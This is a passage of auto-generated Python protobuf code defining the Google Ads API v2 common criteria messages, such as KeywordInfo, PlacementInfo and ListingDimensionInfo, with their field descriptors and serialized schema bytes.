from google.ads.google_ads.v2.proto.enums import product_condition_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2
from google.ads.google_ads.v2.proto.enums import product_type_level_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2
from google.ads.google_ads.v2.proto.enums import proximity_radius_units_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2
from google.ads.google_ads.v2.proto.enums import webpage_condition_operand_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2
from google.ads.google_ads.v2.proto.enums import webpage_condition_operator_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/common/criteria.proto',
package='google.ads.googleads.v2.common',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v2.commonB\rCriteriaProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/common;common\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V2.Common\312\002\036Google\\Ads\\GoogleAds\\V2\\Common\352\002\"Google::Ads::GoogleAds::V2::Common'),
serialized_pb=_b('\n3google/ads/googleads_v2/proto/common/criteria.proto\x12\x1egoogle.ads.googleads.v2.common\x1a\x38google/ads/googleads_v2/proto/enums/age_range_type.proto\x1a@google/ads/googleads_v2/proto/enums/app_payment_model_type.proto\x1a<google/ads/googleads_v2/proto/enums/content_label_type.proto\x1a\x35google/ads/googleads_v2/proto/enums/day_of_week.proto\x1a\x30google/ads/googleads_v2/proto/enums/device.proto\x1a\x35google/ads/googleads_v2/proto/enums/gender_type.proto\x1a\x43google/ads/googleads_v2/proto/enums/hotel_date_selection_type.proto\x1a;google/ads/googleads_v2/proto/enums/income_range_type.proto\x1a:google/ads/googleads_v2/proto/enums/interaction_type.proto\x1a<google/ads/googleads_v2/proto/enums/keyword_match_type.proto\x1aHgoogle/ads/googleads_v2/proto/enums/listing_custom_attribute_index.proto\x1a<google/ads/googleads_v2/proto/enums/listing_group_type.proto\x1a\x45google/ads/googleads_v2/proto/enums/location_group_radius_units.proto\x1a\x38google/ads/googleads_v2/proto/enums/minute_of_hour.proto\x1a>google/ads/googleads_v2/proto/enums/parental_status_type.proto\x1a@google/ads/googleads_v2/proto/enums/preferred_content_type.proto\x1aHgoogle/ads/googleads_v2/proto/enums/product_bidding_category_level.proto\x1a\x39google/ads/googleads_v2/proto/enums/product_channel.proto\x1a\x45google/ads/googleads_v2/proto/enums/product_channel_exclusivity.proto\x1a;google/ads/googleads_v2/proto/enums/product_condition.proto\x1a<google/ads/googleads_v2/proto/enums/product_type_level.proto\x1a@google/ads/googleads_v2/proto/enums/proximity_radius_units.proto\x1a\x43google/ads/googleads_v2/proto/enums/webpage_condition_operand.proto\x1a\x44google/ads/googleads_v2/proto/enums/webpage_condition_operator.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\"\x93\x01\n\x0bKeywordInfo\x12*\n\x04text\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12X\n\nmatch_type\x18\x02 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.KeywordMatchTypeEnum.KeywordMatchType\":\n\rPlacementInfo\x12)\n\x03url\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"[\n\x15MobileAppCategoryInfo\x12\x42\n\x1cmobile_app_category_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"q\n\x15MobileApplicationInfo\x12,\n\x06\x61pp_id\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12*\n\x04name\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"I\n\x0cLocationInfo\x12\x39\n\x13geo_target_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"L\n\nDeviceInfo\x12>\n\x04type\x18\x01 \x01(\x0e\x32\x30.google.ads.googleads.v2.enums.DeviceEnum.Device\"r\n\x14PreferredContentInfo\x12Z\n\x04type\x18\x02 \x01(\x0e\x32L.google.ads.googleads.v2.enums.PreferredContentTypeEnum.PreferredContentType\"\xf1\x01\n\x10ListingGroupInfo\x12R\n\x04type\x18\x01 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ListingGroupTypeEnum.ListingGroupType\x12H\n\ncase_value\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v2.common.ListingDimensionInfo\x12?\n\x19parent_ad_group_criterion\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\\\n\x10ListingScopeInfo\x12H\n\ndimensions\x18\x02 \x03(\x0b\x32\x34.google.ads.googleads.v2.common.ListingDimensionInfo\"\x9b\t\n\x14ListingDimensionInfo\x12I\n\rlisting_brand\x18\x01 \x01(\x0b\x32\x30.google.ads.googleads.v2.common.ListingBrandInfoH\x00\x12?\n\x08hotel_id\x18\x02 \x01(\x0b\x32+.google.ads.googleads.v2.common.HotelIdInfoH\x00\x12\x45\n\x0bhotel_class\x18\x03 
\x01(\x0b\x32..google.ads.googleads.v2.common.HotelClassInfoH\x00\x12V\n\x14hotel_country_region\x18\x04 \x01(\x0b\x32\x36.google.ads.googleads.v2.common.HotelCountryRegionInfoH\x00\x12\x45\n\x0bhotel_state\x18\x05 \x01(\x0b\x32..google.ads.googleads.v2.common.HotelStateInfoH\x00\x12\x43\n\nhotel_city\x18\x06 \x01(\x0b\x32-.google.ads.googleads.v2.common.HotelCityInfoH\x00\x12^\n\x18listing_custom_attribute\x18\x07 \x01(\x0b\x32:.google.ads.googleads.v2.common.ListingCustomAttributeInfoH\x00\x12^\n\x18product_bidding_category\x18\r \x01(\x0b\x32:.google.ads.googleads.v2.common.ProductBiddingCategoryInfoH\x00\x12M\n\x0fproduct_channel\x18\x08 \x01(\x0b\x32\x32.google.ads.googleads.v2.common.ProductChannelInfoH\x00\x12\x64\n\x1bproduct_channel_exclusivity\x18\t \x01(\x0b\x32=.google.ads.googleads.v2.common.ProductChannelExclusivityInfoH\x00\x12Q\n\x11product_condition\x18\n \x01(\x0b\x32\x34.google.ads.googleads.v2.common.ProductConditionInfoH\x00\x12L\n\x0fproduct_item_id\x18\x0b \x01(\x0b\x32\x31.google.ads.googleads.v2.common.ProductItemIdInfoH\x00\x12G\n\x0cproduct_type\x18\x0c \x01(\x0b\x32/.google.ads.googleads.v2.common.ProductTypeInfoH\x00\x12`\n\x19unknown_listing_dimension\x18\x0e \x01(\x0b\x32;.google.ads.googleads.v2.common.UnknownListingDimensionInfoH\x00\x42\x0b\n\tdimension\"?\n\x10ListingBrandInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\":\n\x0bHotelIdInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"<\n\x0eHotelClassInfo\x12*\n\x05value\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"X\n\x16HotelCountryRegionInfo\x12>\n\x18\x63ountry_region_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x0eHotelStateInfo\x12\x35\n\x0fstate_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"E\n\rHotelCityInfo\x12\x34\n\x0e\x63ity_criterion\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\xb4\x01\n\x1aListingCustomAttributeInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12i\n\x05index\x18\x02 \x01(\x0e\x32Z.google.ads.googleads.v2.enums.ListingCustomAttributeIndexEnum.ListingCustomAttributeIndex\"\xe4\x01\n\x1aProductBiddingCategoryInfo\x12\'\n\x02id\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x32\n\x0c\x63ountry_code\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12i\n\x05level\x18\x03 \x01(\x0e\x32Z.google.ads.googleads.v2.enums.ProductBiddingCategoryLevelEnum.ProductBiddingCategoryLevel\"g\n\x12ProductChannelInfo\x12Q\n\x07\x63hannel\x18\x01 \x01(\x0e\x32@.google.ads.googleads.v2.enums.ProductChannelEnum.ProductChannel\"\x94\x01\n\x1dProductChannelExclusivityInfo\x12s\n\x13\x63hannel_exclusivity\x18\x01 \x01(\x0e\x32V.google.ads.googleads.v2.enums.ProductChannelExclusivityEnum.ProductChannelExclusivity\"o\n\x14ProductConditionInfo\x12W\n\tcondition\x18\x01 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ProductConditionEnum.ProductCondition\"@\n\x11ProductItemIdInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x93\x01\n\x0fProductTypeInfo\x12+\n\x05value\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12S\n\x05level\x18\x02 \x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ProductTypeLevelEnum.ProductTypeLevel\"\x1d\n\x1bUnknownListingDimensionInfo\"|\n\x1aHotelDateSelectionTypeInfo\x12^\n\x04type\x18\x01 \x01(\x0e\x32P.google.ads.googleads.v2.enums.HotelDateSelectionTypeEnum.HotelDateSelectionType\"}\n\x1dHotelAdvanceBookingWindowInfo\x12-\n\x08min_days\x18\x01 
\x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08max_days\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"y\n\x15HotelLengthOfStayInfo\x12/\n\nmin_nights\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\nmax_nights\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"b\n\x13HotelCheckInDayInfo\x12K\n\x0b\x64\x61y_of_week\x18\x01 \x01(\x0e\x32\x36.google.ads.googleads.v2.enums.DayOfWeekEnum.DayOfWeek\"g\n\x13InteractionTypeInfo\x12P\n\x04type\x18\x01 \x01(\x0e\x32\x42.google.ads.googleads.v2.enums.InteractionTypeEnum.InteractionType\"\xe3\x02\n\x0e\x41\x64ScheduleInfo\x12R\n\x0cstart_minute\x18\x01 \x01(\x0e\x32<.google.ads.googleads.v2.enums.MinuteOfHourEnum.MinuteOfHour\x12P\n\nend_minute\x18\x02 \x01(\x0e\x32<.google.ads.googleads.v2.enums.MinuteOfHourEnum.MinuteOfHour\x12/\n\nstart_hour\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12-\n\x08\x65nd_hour\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12K\n\x0b\x64\x61y_of_week\x18\x05 \x01(\x0e\x32\x36.google.ads.googleads.v2.enums.DayOfWeekEnum.DayOfWeek\"Z\n\x0c\x41geRangeInfo\x12J\n\x04type\x18\x01 \x01(\x0e\x32<.google.ads.googleads.v2.enums.AgeRangeTypeEnum.AgeRangeType\"T\n\nGenderInfo\x12\x46\n\x04type\x18\x01 \x01(\x0e\x32\x38.google.ads.googleads.v2.enums.GenderTypeEnum.GenderType\"c\n\x0fIncomeRangeInfo\x12P\n\x04type\x18\x01 \x01(\x0e\x32\x42.google.ads.googleads.v2.enums.IncomeRangeTypeEnum.IncomeRangeType\"l\n\x12ParentalStatusInfo\x12V\n\x04type\x18\x01 \x01(\x0e\x32H.google.ads.googleads.v2.enums.ParentalStatusTypeEnum.ParentalStatusType\"B\n\x10YouTubeVideoInfo\x12.\n\x08video_id\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"F\n\x12YouTubeChannelInfo\x12\x30\n\nchannel_id\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"?\n\x0cUserListInfo\x12/\n\tuser_list\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\xa0\x02\n\rProximityInfo\x12?\n\tgeo_point\x18\x01 \x01(\x0b\x32,.google.ads.googleads.v2.common.GeoPointInfo\x12,\n\x06radius\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x62\n\x0cradius_units\x18\x03 \x01(\x0e\x32L.google.ads.googleads.v2.enums.ProximityRadiusUnitsEnum.ProximityRadiusUnits\x12<\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32+.google.ads.googleads.v2.common.AddressInfo\"\x8f\x01\n\x0cGeoPointInfo\x12?\n\x1alongitude_in_micro_degrees\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\x12>\n\x19latitude_in_micro_degrees\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int32Value\"\xfc\x02\n\x0b\x41\x64\x64ressInfo\x12\x31\n\x0bpostal_code\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x33\n\rprovince_code\x18\x02 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x32\n\x0c\x63ountry_code\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x33\n\rprovince_name\x18\x04 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x34\n\x0estreet_address\x18\x05 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12\x35\n\x0fstreet_address2\x18\x06 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12/\n\tcity_name\x18\x07 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"m\n\tTopicInfo\x12\x34\n\x0etopic_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12*\n\x04path\x18\x02 \x03(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x0cLanguageInfo\x12\x37\n\x11language_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"?\n\x0bIpBlockInfo\x12\x30\n\nip_address\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"f\n\x10\x43ontentLabelInfo\x12R\n\x04type\x18\x01 
\x01(\x0e\x32\x44.google.ads.googleads.v2.enums.ContentLabelTypeEnum.ContentLabelType\"E\n\x0b\x43\x61rrierInfo\x12\x36\n\x10\x63\x61rrier_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"P\n\x10UserInterestInfo\x12<\n\x16user_interest_category\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x8d\x01\n\x0bWebpageInfo\x12\x34\n\x0e\x63riterion_name\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12H\n\nconditions\x18\x02 \x03(\x0b\x32\x34.google.ads.googleads.v2.common.WebpageConditionInfo\"\x93\x02\n\x14WebpageConditionInfo\x12\x63\n\x07operand\x18\x01 \x01(\x0e\x32R.google.ads.googleads.v2.enums.WebpageConditionOperandEnum.WebpageConditionOperand\x12\x66\n\x08operator\x18\x02 \x01(\x0e\x32T.google.ads.googleads.v2.enums.WebpageConditionOperatorEnum.WebpageConditionOperator\x12.\n\x08\x61rgument\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"e\n\x1aOperatingSystemVersionInfo\x12G\n!operating_system_version_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"o\n\x13\x41ppPaymentModelInfo\x12X\n\x04type\x18\x01 \x01(\x0e\x32J.google.ads.googleads.v2.enums.AppPaymentModelTypeEnum.AppPaymentModelType\"P\n\x10MobileDeviceInfo\x12<\n\x16mobile_device_constant\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"K\n\x12\x43ustomAffinityInfo\x12\x35\n\x0f\x63ustom_affinity\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"G\n\x10\x43ustomIntentInfo\x12\x33\n\rcustom_intent\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\"\x94\x02\n\x11LocationGroupInfo\x12*\n\x04\x66\x65\x65\x64\x18\x01 \x01(\x0b\x32\x1c.google.protobuf.StringValue\x12:\n\x14geo_target_constants\x18\x02 \x03(\x0b\x32\x1c.google.protobuf.StringValue\x12+\n\x06radius\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12j\n\x0cradius_units\x18\x04 \x01(\x0e\x32T.google.ads.googleads.v2.enums.LocationGroupRadiusUnitsEnum.LocationGroupRadiusUnitsB\xe8\x01\n\"com.google.ads.googleads.v2.commonB\rCriteriaProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/common;common\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V2.Common\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V2\\Common\xea\x02\"Google::Ads::GoogleAds::V2::Commonb\x06proto3')
,
dependencies=[google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_age__range__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_app__payment__model__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_content__label__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_day__of__week__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_device__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_gender__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_hotel__date__selection__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_income__range__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_interaction__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_keyword__match__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__custom__attribute__index__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_listing__group__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_location__group__radius__units__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_minute__of__hour__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_parental__status__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_preferred__content__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__bidding__category__level__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__channel__exclusivity__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__condition__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_product__type__level__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_proximity__radius__units__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operand__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v2_dot_proto_dot_enums_dot_webpage__condition__operator__pb2.DESCRIPTOR,google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_KEYWORDINFO = _descriptor.Descriptor(
name='KeywordInfo',
full_name='google.ads.googleads.v2.common.KeywordInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='text', full_name='google.ads.googleads.v2.common.KeywordInfo.text', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='match_type', full_name='google.ads.googleads.v2.common.KeywordInfo.match_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1675,
serialized_end=1822,
)
_PLACEMENTINFO = _descriptor.Descriptor(
name='PlacementInfo',
full_name='google.ads.googleads.v2.common.PlacementInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='google.ads.googleads.v2.common.PlacementInfo.url', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1824,
serialized_end=1882,
)
_MOBILEAPPCATEGORYINFO = _descriptor.Descriptor(
name='MobileAppCategoryInfo',
full_name='google.ads.googleads.v2.common.MobileAppCategoryInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mobile_app_category_constant', full_name='google.ads.googleads.v2.common.MobileAppCategoryInfo.mobile_app_category_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1884,
serialized_end=1975,
)
_MOBILEAPPLICATIONINFO = _descriptor.Descriptor(
name='MobileApplicationInfo',
full_name='google.ads.googleads.v2.common.MobileApplicationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='app_id', full_name='google.ads.googleads.v2.common.MobileApplicationInfo.app_id', index=0,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='google.ads.googleads.v2.common.MobileApplicationInfo.name', index=1,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1977,
serialized_end=2090,
)
_LOCATIONINFO = _descriptor.Descriptor(
name='LocationInfo',
full_name='google.ads.googleads.v2.common.LocationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='geo_target_constant', full_name='google.ads.googleads.v2.common.LocationInfo.geo_target_constant', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2092,
serialized_end=2165,
)
_DEVICEINFO = _descriptor.Descriptor(
name='DeviceInfo',
full_name='google.ads.googleads.v2.common.DeviceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.DeviceInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2167,
serialized_end=2243,
)
_PREFERREDCONTENTINFO = _descriptor.Descriptor(
name='PreferredContentInfo',
full_name='google.ads.googleads.v2.common.PreferredContentInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.PreferredContentInfo.type', index=0,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2245,
serialized_end=2359,
)
_LISTINGGROUPINFO = _descriptor.Descriptor(
name='ListingGroupInfo',
full_name='google.ads.googleads.v2.common.ListingGroupInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v2.common.ListingGroupInfo.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='case_value', full_name='google.ads.googleads.v2.common.ListingGroupInfo.case_value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='parent_ad_group_criterion', full_name='google.ads.googleads.v2.common.ListingGroupInfo.parent_ad_group_criterion', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2362,
serialized_end=2603,
)
_LISTINGSCOPEINFO = _descriptor.Descriptor(
name='ListingScopeInfo',
full_name='google.ads.googleads.v2.common.ListingScopeInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='dimensions', full_name='google.ads.googleads.v2.common.ListingScopeInfo.dimensions', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2605,
serialized_end=2697,
)
_LISTINGDIMENSIONINFO = _descriptor.Descriptor(
name='ListingDimensionInfo',
full_name='google.ads.googleads.v2.common.ListingDimensionInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='listing_brand', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.listing_brand', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_id', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_id', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_class', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_class', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_country_region', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_country_region', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_state', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_state', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hotel_city', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.hotel_city', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='listing_custom_attribute', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.listing_custom_attribute', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product_bidding_category', full_name='google.ads.googleads.v2.common.ListingDimensionInfo.product_bidding_category', index=7,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
